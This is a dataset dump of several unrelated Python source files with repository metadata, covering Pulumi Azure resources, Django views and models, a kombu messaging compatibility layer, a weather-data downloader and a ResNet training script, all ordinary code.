pulumi.Alias(type_="azure-native:network/v20200801:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20201101:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20210201:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20210301:VirtualNetworkTap"), pulumi.Alias(type_="azure-native:network/v20210501:VirtualNetworkTap")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(VirtualNetworkTap, __self__).__init__(
'azure-native:network:VirtualNetworkTap',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'VirtualNetworkTap':
"""
Get an existing VirtualNetworkTap resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = VirtualNetworkTapInitArgs.__new__(VirtualNetworkTapInitArgs)
__props__.__dict__["destination_load_balancer_front_end_ip_configuration"] = None
__props__.__dict__["destination_network_interface_ip_configuration"] = None
__props__.__dict__["destination_port"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["network_interface_tap_configurations"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["resource_guid"] = None
__props__.__dict__["tags"] = None
__props__.__dict__["type"] = None
return VirtualNetworkTap(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="destinationLoadBalancerFrontEndIPConfiguration")
def destination_load_balancer_front_end_ip_configuration(self) -> pulumi.Output[Optional['outputs.FrontendIPConfigurationResponse']]:
"""
The reference to the private IP address on the internal Load Balancer that will receive the tap.
"""
return pulumi.get(self, "destination_load_balancer_front_end_ip_configuration")
@property
@pulumi.getter(name="destinationNetworkInterfaceIPConfiguration")
def destination_network_interface_ip_configuration(self) -> pulumi.Output[Optional['outputs.NetworkInterfaceIPConfigurationResponse']]:
"""
The reference to the private IP Address of the collector nic that will receive the tap.
"""
return pulumi.get(self, "destination_network_interface_ip_configuration")
@property
@pulumi.getter(name="destinationPort")
def destination_port(self) -> pulumi.Output[Optional[int]]:
"""
The VXLAN destination port that will receive the tapped traffic.
"""
return pulumi.get(self, "destination_port")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
A unique read-only string that changes whenever the resource is updated.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def location(self) -> pulumi.Output[Optional[str]]:
"""
Resource location.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Resource name.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="networkInterfaceTapConfigurations")
def network_interface_tap_configurations(self) -> pulumi.Output[Sequence['outputs.NetworkInterfaceTapConfigurationResponse']]:
"""
Specifies the list of resource IDs for the network interface IP configuration that needs to be tapped.
"""
return pulumi.get(self, "network_interface_tap_configurations")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
The provisioning state of the virtual network tap resource.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceGuid")
def resource_guid(self) -> pulumi.Output[str]:
"""
The resource GUID property of the virtual network tap resource.
"""
return pulumi.get(self, "resource_guid")
@property
@pulumi.getter
def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Resource type.
"""
return pulumi.get(self, "type")
| [
"[email protected]"
]
| |
708a1faf765b96d7f5a0505c9bf4c02d987ff8ba | 07504838d12c6328da093dce3726e8ed096cecdb | /pylon/resources/properties/highLimDly.py | bc4cf1c574d3d5599664567f174174735af07093 | []
| no_license | lcoppa/fiat-lux | 9caaa7f3105e692a149fdd384ec590676f06bf00 | 7c166bcc08768da67c241078b397570de159e240 | refs/heads/master | 2020-04-04T02:47:19.917668 | 2013-10-10T10:22:51 | 2013-10-10T10:22:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,294 | py | """highLimDly standard property type, originally defined in resource file set
standard 00:00:00:00:00:00:00:00-0."""
# Copyright (C) 2013 Echelon Corporation. All Rights Reserved.
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software" to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# This file is generated from device resource files using an automated
# database to source code conversion process. Grammar and punctuation within
# the embedded documentation may not be correct, as this data is gathered and
# combined from several sources. The machine-generated code may not meet
# compliance with PEP-8 and PEP-257 recommendations at all times.
# Generated at 23-Sep-2013 09:15.
import pylon.resources.datapoints.time_sec
from pylon.resources.standard import standard
class highLimDly(pylon.resources.datapoints.time_sec.time_sec):
"""highLimDly standard property type. High limit delay. The time limit
during normal operation before the alarm air temp high alarm is
recognized."""
def __init__(self):
super().__init__(
)
self._default_bytes = b'\x00\x00'
self._original_name = 'SCPThighLimDly'
self._property_scope, self._property_key = 0, 124
self._definition = standard.add(self)
if __name__ == '__main__':
# unit test code.
item = highLimDly()
pass
| [
"[email protected]"
]
| |
2f8c03f052351b799bfba46a92f2566cc993aedd | 5181d3b3ef8fe301ea2d6b095260e9d327c2fd79 | /scripts/dl/download_hrrr.py | dad9ed84e463252c8a1b7b4fff6d35e96c53d1d1 | []
| no_license | danhreitz/iem | 88113ef9c9c4a2918c9c2abdfd0510d5ca4ec819 | ed490dcd6c2a8359f88cb805ccee8f6707566f57 | refs/heads/master | 2021-01-18T15:27:28.607250 | 2015-08-10T21:33:54 | 2015-08-10T21:33:54 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,340 | py | """
Since the NOAAPort feed of HRRR data does not have radiation, we should
download this manually from NCEP
Run at 40 AFTER for the previous hour
"""
import urllib2
import sys
import datetime
import os
def fetch(valid):
""" Fetch the radiation data for this timestamp
80:54371554:d=2014101002:ULWRF:top of atmosphere:anl:
81:56146124:d=2014101002:DSWRF:surface:anl:
"""
uri = valid.strftime(("http://www.ftp.ncep.noaa.gov/data/nccf/"
"nonoperational/com/hrrr/prod/hrrr.%Y%m%d/hrrr.t%Hz."
"wrfprsf00.grib2.idx"))
data = urllib2.urlopen(uri, timeout=30)
offsets = []
neednext = False
for line in data:
tokens = line.split(":")
if neednext:
offsets[-1].append(int(tokens[1]))
neednext = False
if tokens[3] in ['ULWRF', 'DSWRF']:
offsets.append([int(tokens[1]), ])
neednext = True
# Save soil temp and water at surface, 10cm and 40cm
if tokens[3] in ['TSOIL', 'SOILW']:
if tokens[4] in ['0-0 m below ground',
'0.01-0.01 m below ground',
'0.04-0.04 m below ground']:
offsets.append([int(tokens[1]), ])
neednext = True
outfn = valid.strftime(("/mesonet/ARCHIVE/data/%Y/%m/%d/model/hrrr/"
"%H/hrrr.t%Hz.3kmf00.grib2"))
outdir = os.path.dirname(outfn)
if not os.path.isdir(outdir):
os.makedirs(outdir, mode=0775) # make sure LDM can then write to dir
output = open(outfn, 'ab', 0664)
req = urllib2.Request(uri[:-4])
if len(offsets) != 8:
print("download_hrrr_rad warning, found %s gribs for %s" % (
len(offsets), valid))
for pr in offsets:
req.headers['Range'] = 'bytes=%s-%s' % (pr[0], pr[1])
f = urllib2.urlopen(req, timeout=30)
output.write(f.read())
output.close()
def main():
""" Go Main Go"""
ts = datetime.datetime.utcnow() - datetime.timedelta(hours=1)
if len(sys.argv) == 5:
ts = datetime.datetime(int(sys.argv[1]), int(sys.argv[2]),
int(sys.argv[3]), int(sys.argv[4]))
fetch(ts)
if __name__ == '__main__':
os.umask(0002)
main()
| [
"[email protected]"
]
| |
3b79ecee53bab652825699f9a829541d12808883 | 53d22468fb1c9e0f4b4710a31fb7ac638549b8a7 | /src/episode_stats.py | 8c746bbebadc8b8367d5a5f0ae15a6bda7162cea | [
"MIT"
]
| permissive | binderwang/drivebot | 768bcfe224d94b931c45c41ced2a1b0067c6417d | a8fb86731c52b7594dd135e8759622c29172b557 | refs/heads/master | 2020-12-14T09:48:59.857490 | 2016-05-03T03:17:58 | 2016-05-03T03:17:58 | 58,269,730 | 1 | 0 | null | 2016-05-07T14:33:18 | 2016-05-07T14:33:17 | null | UTF-8 | Python | false | false | 261 | py | #!/usr/bin/env python
import json
import sys
episode_id = 0
for line in sys.stdin:
episode = json.loads(line)
rewards = [event['reward'] for event in episode]
print "\t".join(map(str, [episode_id, len(episode), sum(rewards)]))
episode_id += 1
| [
"[email protected]"
]
| |
1ed8a791199fb00c45f4eb0ca5c4eb7b0da7e94c | 20db5a27f2a8b2d324085f5e1ec6c46ad7c1e8c3 | /manage.py | c330237e8173667cd9d46db5ee3ead0af6d478a2 | []
| no_license | mortadagzar/djangoMovie | dae326fc83a31e485792b1ee42fa89b7d681049d | e83904c0c1ecc45992eed7516cb483bd2c97590b | refs/heads/master | 2020-04-01T22:32:28.246877 | 2018-10-19T02:41:22 | 2018-10-19T02:41:22 | 153,713,907 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 543 | py | #!/usr/bin/env python
import os
import sys
if __name__ == '__main__':
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'djangoMovie.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
| [
"[email protected]"
]
| |
f6b0c0ebfcfea1688b03ec725be8faebb3cbbbee | 2598f255696842f043372dd68fe4d5fd48d1a41c | /Ofelia/expedient/src/python/expedient/clearinghouse/users/views.py | 5bd342d561ba8106b5c71655fbdfedc0cbb0a6c3 | [
"BSD-3-Clause"
]
| permissive | zanetworker/C-BAS | 8e5442df83626e95d9562497278869ee3c4fad51 | 695c6f72490a02bbb308d44526631dbf426ab900 | refs/heads/master | 2021-01-01T06:55:39.085086 | 2014-08-11T09:37:42 | 2014-08-11T09:37:42 | 22,351,372 | 1 | 0 | null | 2014-08-08T16:15:54 | 2014-07-28T17:28:44 | Python | UTF-8 | Python | false | false | 7,668 | py | '''
Created on Dec 3, 2009
@author: jnaous
'''
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect, HttpResponseNotAllowed
from django.core.urlresolvers import reverse
from expedient.clearinghouse import users
from django.views.generic import create_update, simple
from django.contrib import auth
from expedient.common.permissions.shortcuts import must_have_permission,\
give_permission_to
from registration import views as registration_views
from expedient.clearinghouse.users.forms import FullRegistrationForm
from django.conf import settings
from django.contrib.auth.models import User
from django.contrib.auth.views import password_reset
from expedient.clearinghouse.users.forms import LDAPPasswordResetForm
def home(request):
'''show list of users and form for adding users'''
must_have_permission(request.user, User, "can_manage_users")
user_list = auth.models.User.objects.all().order_by('username')
if request.method == "GET":
pwd_form = auth.forms.UserCreationForm()
user_form = users.forms.UserForm()
userprofile_form = users.forms.UserProfileForm()
elif request.method == "POST":
pwd_form = auth.forms.UserCreationForm(request.POST)
user_form = users.forms.UserForm(request.POST)
userprofile_form = users.forms.UserProfileForm(request.POST)
# check that all data is valid
if pwd_form.is_valid() and user_form.is_valid() and userprofile_form.is_valid():
# create the user first
user = pwd_form.save()
# use the user to save the user info
user_form = users.forms.UserForm(request.POST, instance=user)
user = user_form.save()
# now store the user profile
up = users.models.UserProfile(user=user)
userprofile_form = users.forms.UserProfileForm(request.POST, instance=up)
userprofile_form.save()
return HttpResponseRedirect(reverse("users_saved", args=(user.id,)))
else:
return HttpResponseNotAllowed("GET", "POST")
return simple.direct_to_template(
request,
template='expedient/clearinghouse/users/home.html',
extra_context={
'user_list': user_list,
'pwd_form': pwd_form,
'user_form': user_form,
'userprofile_form': userprofile_form,
'breadcrumbs': (
("Home", reverse("home")),
("Manage users", request.path),
)
},
)
def detail(request, user_id=None):
if user_id == None:
user = request.user
else:
user = get_object_or_404(auth.models.User, pk=user_id)
must_have_permission(request.user, user, "can_edit_user")
profile = users.models.UserProfile.get_or_create_profile(user)
if request.method == "GET":
if user_id == None:
pwd_form = users.forms.PasswordChangeFormDisabled(user)
else:
pwd_form = users.forms.AdminPasswordChangeFormDisabled(user)
user_form = users.forms.UserForm(instance=user)
userprofile_form = users.forms.UserProfileForm(instance=profile)
elif request.method == "POST":
if request.POST.get("change_pwd", False):
data = request.POST
else:
data = None
if user_id == None:
pwd_form = users.forms.PasswordChangeFormDisabled(user, data)
else:
pwd_form = users.forms.AdminPasswordChangeFormDisabled(user, data)
user_form = users.forms.UserForm(request.POST, instance=user)
userprofile_form = users.forms.UserProfileForm(request.POST, instance=profile)
if user_form.is_valid() and userprofile_form.is_valid():
user = user_form.save()
userprofile_form = users.forms.UserProfileForm(request.POST, instance=profile)
userprofile_form.save()
if request.POST.get("change_pwd", False) and pwd_form.is_valid():
pwd_form.save()
return HttpResponseRedirect(reverse("users_saved", args=(user.id,)))
elif "change_pwd" not in request.POST:
return HttpResponseRedirect(reverse("users_saved", args=(user.id,)))
else:
return HttpResponseNotAllowed("GET", "POST")
try:
slice_set = user.slice_set.all()
except AttributeError:
slice_set = ()
return simple.direct_to_template(
request,
template='expedient/clearinghouse/users/detail.html',
extra_context={
'curr_user': user,
'slices': slice_set,
'pwd_form': pwd_form,
'user_form': user_form,
'show_owner': True,
'userprofile_form': userprofile_form,
'breadcrumbs': (
("Home", reverse("home")),
("Account for %s" % user.username, reverse("users_detail", args=[user.id])),
)
},
)
def saved(request, user_id):
user = get_object_or_404(auth.models.User, pk=user_id)
print user.id
return simple.direct_to_template(
request,
template='expedient/clearinghouse/users/saved.html',
extra_context={
'curr_user': user,
},
)
def delete(request, user_id):
user = get_object_or_404(auth.models.User, pk=user_id)
must_have_permission(request.user, user, "can_edit_user")
return create_update.delete_object(
request,
auth.models.User,
reverse("users_home"),
user_id,
template_name="expedient/clearinghouse/users/confirm_delete.html",
)
def register(request):
try:
return registration_views.register(
request,
form_class=FullRegistrationForm)
except Exception as e:
print "[ERROR] Exception at 'expedient.clearinghouse.users.views': user '%s' (%s) could not fully register. RegistrationForm module returned: %s" % (request.POST['username'], request.POST['email'], str(e))
return simple.direct_to_template(
request,
template='registration/registration_incomplete.html',
extra_context={
'exception': e,
'root_email': settings.ROOT_EMAIL,
'failed_username': request.POST['username'],
'failed_email': request.POST['email'],
},
)
def activate(request, activation_key):
template_name = 'registration/activate.html'
activation_key = activation_key.lower() # Normalize before trying anything with it.
# Import only here to avoid every time warning 'DeprecationWarning:
# the sha module is deprecated; use the hashlib module instead'
from registration.models import RegistrationProfile
account = RegistrationProfile.objects.activate_user(activation_key)
if account:
give_permission_to(
"can_edit_user", account, account, can_delegate=True)
return simple.direct_to_template(
request,
template=template_name,
extra_context={
'account': account,
'expiration_days': settings.ACCOUNT_ACTIVATION_DAYS,
},
)
def my_password_reset(request):
if request.method == 'GET':
return password_reset(request)
else:
email = request.POST['email']
users = User.objects.filter(email = email)
if len(users) == 1 and users[0].password == '!':
return HttpResponseRedirect(settings.OFREG_URL+settings.OFREG_RESET_PATH)
else:
return password_reset(request, password_reset_form=LDAPPasswordResetForm)
| [
"[email protected]"
]
| |
8d637f9712aa8cd0fa725ea3c7b3285cb522f1da | be5a758c99f05c8ae8c224bf43335154114ee5f6 | /kombu/compat.py | 224f2e33e5d44865c3202047427a7e1c535ba30d | [
"BSD-3-Clause"
]
| permissive | bradjasper/kombu | 160ed1b5651f91a87752df40791d01c91ca1fe16 | 4c9ac1436eb0468508f8b2cf1bda997535e1326d | refs/heads/master | 2021-01-16T00:23:17.928400 | 2010-07-28T17:25:32 | 2010-07-28T17:25:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,431 | py | from itertools import count
from kombu import entity
from kombu import messaging
def iterconsume(connection, consumer, no_ack=False, limit=None):
consumer.consume(no_ack=no_ack)
for iteration in count(0):
if limit and iteration >= limit:
raise StopIteration
yield connection.drain_events()
def entry_to_binding(queue, **options):
binding_key = options.get("binding_key") or options.get("routing_key")
e_durable = options.get("exchange_durable") or options.get("durable")
e_auto_delete = options.get("exchange_auto_delete") or \
options.get("auto_delete")
q_durable = options.get("queue_durable") or options.get("durable")
q_auto_delete = options.get("queue_auto_delete") or \
options.get("auto_delete")
e_arguments = options.get("exchange_arguments")
q_arguments = options.get("queue_arguments")
b_arguments = options.get("binding_arguments")
exchange = entity.Exchange(options.get("exchange"),
type=options.get("exchange_type"),
delivery_mode=options.get("delivery_mode"),
routing_key=options.get("routing_key"),
durable=e_durable,
auto_delete=e_auto_delete,
arguments=e_arguments)
return entity.Binding(queue,
exchange=exchange,
routing_key=binding_key,
durable=q_durable,
exclusive=options.get("exclusive"),
auto_delete=q_auto_delete,
queue_arguments=q_arguments,
binding_arguments=b_arguments)
class Publisher(messaging.Producer):
exchange = ""
exchange_type = "direct"
routing_key = ""
durable = True
auto_delete = False
_closed = False
def __init__(self, connection, exchange=None, routing_key=None,
exchange_type=None, durable=None, auto_delete=None, **kwargs):
self.connection = connection
self.backend = connection.channel()
self.exchange = exchange or self.exchange
self.exchange_type = exchange_type or self.exchange_type
self.routing_key = routing_key or self.routing_key
if auto_delete is not None:
self.auto_delete = auto_delete
if durable is not None:
self.durable = durable
if not isinstance(self.exchange, entity.Exchange):
self.exchange = entity.Exchange(name=self.exchange,
type=self.exchange_type,
routing_key=self.routing_key,
auto_delete=self.auto_delete,
durable=self.durable)
super(Publisher, self).__init__(self.backend, self.exchange,
**kwargs)
def send(self, *args, **kwargs):
return self.publish(*args, **kwargs)
def close(self):
self.backend.close()
self._closed = True
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
class Consumer(messaging.Consumer):
queue = ""
exchange = ""
routing_key = ""
exchange_type = "direct"
durable = True
exclusive = False
auto_delete = False
exchange_type = "direct"
_closed = False
def __init__(self, connection, queue=None, exchange=None,
routing_key=None, exchange_type=None, durable=None,
exclusive=None, auto_delete=None, **kwargs):
self.connection = connection
self.backend = connection.channel()
if durable is not None:
self.durable = durable
if exclusive is not None:
self.exclusive = exclusive
if auto_delete is not None:
self.auto_delete = auto_delete
self.queue = queue or self.queue
self.exchange = exchange or self.exchange
self.exchange_type = exchange_type or self.exchange_type
self.routing_key = routing_key or self.routing_key
exchange = entity.Exchange(self.exchange,
type=self.exchange_type,
routing_key=self.routing_key,
auto_delete=self.auto_delete,
durable=self.durable)
binding = entity.Binding(self.queue,
exchange=exchange,
routing_key=self.routing_key,
durable=self.durable,
exclusive=self.exclusive,
auto_delete=self.auto_delete)
super(Consumer, self).__init__(self.backend, binding, **kwargs)
def close(self):
self.cancel()
self.backend.close()
self._closed = True
def __enter__(self):
return self
def __exit__(self, *exc_info):
self.close()
def __iter__(self):
return self.iterqueue(infinite=True)
def fetch(self, no_ack=None, enable_callbacks=False):
if no_ack is None:
no_ack = self.no_ack
message = self.bindings[0].get(no_ack)
if message:
if enable_callbacks:
self.receive(message.payload, message)
return message
def process_next(self):
raise NotImplementedError("Use fetch(enable_callbacks=True)")
def discard_all(self, filterfunc=None):
if filterfunc is not None:
raise NotImplementedError(
"discard_all does not implement filters")
return self.purge()
def iterconsume(self, limit=None, no_ack=None):
return iterconsume(self.connection, self, no_ack, limit)
def wait(self, limit=None):
it = self.iterconsume(limit)
return list(it)
def iterqueue(self, limit=None, infinite=False):
for items_since_start in count():
item = self.fetch()
if (not infinite and item is None) or \
(limit and items_since_start >= limit):
raise StopIteration
yield item
class _CSet(messaging.Consumer):
def __init__(self, connection, *args, **kwargs):
self.connection = connection
self.backend = connection.channel()
super(_CSet, self).__init__(self.backend, *args, **kwargs)
def iterconsume(self, limit=None, no_ack=False):
return iterconsume(self.connection, self, no_ack, limit)
def discard_all(self):
return self.purge()
def add_consumer_from_dict(self, queue, **options):
self.bindings.append(entry_to_binding(queue, **options))
def add_consumer(self, consumer):
self.bindings.extend(consumer.bindings)
def close(self):
self.cancel()
self.channel.close()
def ConsumerSet(connection, from_dict=None, consumers=None,
callbacks=None, **kwargs):
bindings = []
if consumers:
for consumer in consumers:
map(bindings.extend, consumer.bindings)
if from_dict:
for queue_name, queue_options in from_dict.items():
bindings.append(entry_to_binding(queue_name, **queue_options))
return _CSet(connection, bindings, **kwargs)
| [
"[email protected]"
]
| |
c3af127904d957a29958033e8898da66cbee1238 | 70ed82598c7ae19dc3de4a3a8400e9767b8a74b0 | /Net/BaseNet/ResNet/fine_tuning_2.py | a5c28f115867e33b9eb23304dfaf71d8d7a0216b | []
| no_license | UpCoder/MedicalImage | f255922b988392cd4c3a90715fb945ee20edb3b4 | 34c11562658e6f362ee7eb53740ba96209a22d45 | refs/heads/master | 2021-01-19T16:59:13.251726 | 2017-12-04T14:55:32 | 2017-12-04T14:55:32 | 101,031,357 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,832 | py | # -*- coding: utf-8 -*-
# 使用patch训练好的模型,来对ROI进行微调
from resnet import inference_small, loss
import tensorflow as tf
from Config import Config as sub_Config
from Slice.MaxSlice.MaxSlice_Resize import MaxSlice_Resize
from tensorflow.examples.tutorials.mnist import input_data
from Tools import changed_shape, calculate_acc_error, acc_binary_acc
import numpy as np
from Patch.ValData import ValDataSet
from Patch.Config import Config as patch_config
def train(train_data_set, val_data_set, load_model_path, save_model_path):
x = tf.placeholder(
tf.float32,
shape=[
None,
sub_Config.IMAGE_W,
sub_Config.IMAGE_H,
sub_Config.IMAGE_CHANNEL
],
name='input_x'
)
y_ = tf.placeholder(
tf.float32,
shape=[
None,
]
)
tf.summary.histogram(
'label',
y_
)
global_step = tf.Variable(0, trainable=False)
# variable_average = tf.train.ExponentialMovingAverage(
# sub_Config.MOVING_AVERAGE_DECAY,
# global_step
# )
# vaeriable_average_op = variable_average.apply(tf.trainable_variables())
# regularizer = tf.contrib.layers.l2_regularizer(sub_Config.REGULARIZTION_RATE)
is_training = tf.placeholder('bool', [], name='is_training')
FLAGS = tf.app.flags.FLAGS
tf.app.flags.DEFINE_string('data_dir', '/tmp/cifar-data',
'where to store the dataset')
tf.app.flags.DEFINE_boolean('use_bn', True, 'use batch normalization. otherwise use biases')
y = inference_small(x, is_training=is_training,
num_classes=sub_Config.OUTPUT_NODE,
use_bias=FLAGS.use_bn,
num_blocks=3)
tf.summary.histogram(
'logits',
tf.argmax(y, 1)
)
loss_ = loss(
logits=y,
labels=tf.cast(y_, np.int32)
)
tf.summary.scalar(
'loss',
loss_
)
train_op = tf.train.GradientDescentOptimizer(
learning_rate=sub_Config.LEARNING_RATE
).minimize(
loss=loss_,
global_step=global_step
)
# with tf.control_dependencies([train_step, vaeriable_average_op]):
# train_op = tf.no_op(name='train')
with tf.variable_scope('accuracy'):
accuracy_tensor = tf.reduce_mean(
tf.cast(
tf.equal(x=tf.argmax(y, 1), y=tf.cast(y_, tf.int64)),
tf.float32
)
)
tf.summary.scalar(
'accuracy',
accuracy_tensor
)
saver = tf.train.Saver()
merge_op = tf.summary.merge_all()
with tf.Session() as sess:
sess.run(tf.global_variables_initializer())
if load_model_path:
saver.restore(sess, load_model_path)
writer = tf.summary.FileWriter('./log/fine_tuning/train', tf.get_default_graph())
val_writer = tf.summary.FileWriter('./log/fine_tuning/val', tf.get_default_graph())
for i in range(sub_Config.ITERATOE_NUMBER):
images, labels = train_data_set.get_next_batch(sub_Config.BATCH_SIZE, sub_Config.BATCH_DISTRIBUTION)
images = changed_shape(images, [
len(images),
sub_Config.IMAGE_W,
sub_Config.IMAGE_W,
sub_Config.IMAGE_CHANNEL
])
_, loss_value, accuracy_value, summary, global_step_value = sess.run(
[train_op, loss_, accuracy_tensor, merge_op, global_step],
feed_dict={
x: images,
y_: labels
}
)
writer.add_summary(
summary=summary,
global_step=global_step_value
)
if i % 100 == 0 and i != 0 and save_model_path is not None:
# 保存模型 五分类每500步保存一下模型
import os
save_path = os.path.join(save_model_path, str(global_step_value))
if not os.path.exists(save_path):
os.mkdir(save_path)
save_path += '/model.ckpt'
print 'mode saved path is ', save_path
saver.save(sess, save_path)
if i % 100 == 0:
validation_images, validation_labels = val_data_set.get_next_batch()
validation_images = changed_shape(
validation_images,
[
len(validation_images),
sub_Config.IMAGE_W,
sub_Config.IMAGE_W,
1
]
)
validation_accuracy, validation_loss, summary, logits = sess.run(
[accuracy_tensor, loss_, merge_op, y],
feed_dict={
x: validation_images,
y_: validation_labels
}
)
calculate_acc_error(
logits=np.argmax(logits, 1),
label=validation_labels,
show=True
)
binary_acc = acc_binary_acc(
logits=np.argmax(logits, 1),
label=validation_labels,
)
val_writer.add_summary(summary, global_step_value)
print 'step is %d,training loss value is %g, accuracy is %g ' \
'validation loss value is %g, accuracy is %g, binary_acc is %g' % \
(global_step_value, loss_value, accuracy_value, validation_loss, validation_accuracy, binary_acc)
writer.close()
val_writer.close()
if __name__ == '__main__':
phase_name = 'ART'
state = ''
traindatapath = '/home/give/Documents/dataset/MedicalImage/MedicalImage/ROI/train'
valdatapath = '/home/give/Documents/dataset/MedicalImage/MedicalImage/ROI/val'
val_dataset = ValDataSet(new_size=[sub_Config.IMAGE_W, sub_Config.IMAGE_H],
phase=phase_name,
category_number=2,
shuffle=True,
data_path=valdatapath
)
train_dataset = ValDataSet(new_size=[sub_Config.IMAGE_W, sub_Config.IMAGE_H],
phase=phase_name,
category_number=2,
data_path=traindatapath,
shuffle=True,
)
train(
train_dataset,
val_dataset,
load_model_path=None,
save_model_path='/home/give/PycharmProjects/MedicalImage/Net/BaseNet/ResNet/models/fine_tuning/2-128/'
) | [
"[email protected]"
]
| |
efc54871703ecce3f1cb626bd1351abbdff392ef | 34ef83114e02b173bd2d55eb53ad399e738a8e3c | /django/test_bootstrap/blog/models.py | b12d7ddd4b0a24411e62b4e99bf00bcafa60e565 | []
| no_license | vavilon/Python3 | e976a18eb301e4953696d1e3f4730ed890da015a | 8c79729747ce51d60ad685e6a2e58292954ed7eb | refs/heads/master | 2023-01-09T13:44:37.408601 | 2018-01-25T22:41:14 | 2018-01-25T22:41:14 | 100,892,055 | 0 | 1 | null | 2022-12-26T20:29:27 | 2017-08-20T22:23:06 | Python | UTF-8 | Python | false | false | 506 | py | from django.db import models
# Create your models here.
from django.utils import timezone
class Post(models.Model):
author = models.ForeignKey('auth.User')
title = models.CharField(max_length=200)
text = models.TextField()
created_date = models.DateTimeField(
default=timezone.now)
published_date = models.DateTimeField(
blank=True, null=True
)
def publish(self):
self.published_date = timezone.now()
def __str__(self):
return self.title
| [
"[email protected]"
]
| |
3fac458c8f38d04e4724c1f19199c6c517b324b6 | 675b72eae65f8e258794decf9627e5fdf8b04559 | /plugin_tests/examples_test.py | aa8ae4a0e021a3a57aefdf2dd02021e68f45841a | [
"Apache-2.0"
]
| permissive | jbeezley/large_image | 368f730ea6fe2c4b75a9c3412c08ce8f41be545a | ac4cbaff4ae2fbbde425d3cd1aee2ff03e6235c8 | refs/heads/master | 2021-01-11T06:15:48.687563 | 2016-10-24T17:09:08 | 2016-10-24T17:09:08 | 71,806,470 | 0 | 0 | null | 2016-10-24T16:04:04 | 2016-10-24T16:04:03 | null | UTF-8 | Python | false | false | 1,695 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
##############################################################################
# Copyright Kitware Inc.
#
# Licensed under the Apache License, Version 2.0 ( the "License" );
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
##############################################################################
import os
import subprocess
import unittest
class LargeImageExamplesTest(unittest.TestCase):
def testAverageColor(self):
# Test running the program
testDir = os.path.dirname(os.path.realpath(__file__))
examplesDir = os.path.join(testDir, '../examples')
prog = 'average_color.py'
imagePath = os.path.join(os.environ['LARGE_IMAGE_DATA'],
'sample_image.ptif')
process = subprocess.Popen(
['python', prog, imagePath, '-m', '1.25'],
shell=False, stdout=subprocess.PIPE, cwd=examplesDir)
results = process.stdout.readlines()
self.assertEqual(len(results), 19)
finalColor = [float(val) for val in results[-1].split()[-3:]]
self.assertEqual(round(finalColor[0]), 245)
self.assertEqual(round(finalColor[1]), 247)
self.assertEqual(round(finalColor[2]), 247)
| [
"[email protected]"
]
| |
434153e344fd51bbd477726190b6bffce6f42c4d | 3de3dae722829727edfdd6cc3b67443a69043475 | /edexOsgi/com.raytheon.uf.common.dataplugin.text/pythonPackages/dynamicserialize/dstypes/com/raytheon/uf/common/dataplugin/text/subscription/request/SubscriptionRequest.py | 237472774c674b7b8fb879656ce996c5d08db82a | [
"LicenseRef-scancode-public-domain",
"Apache-2.0"
]
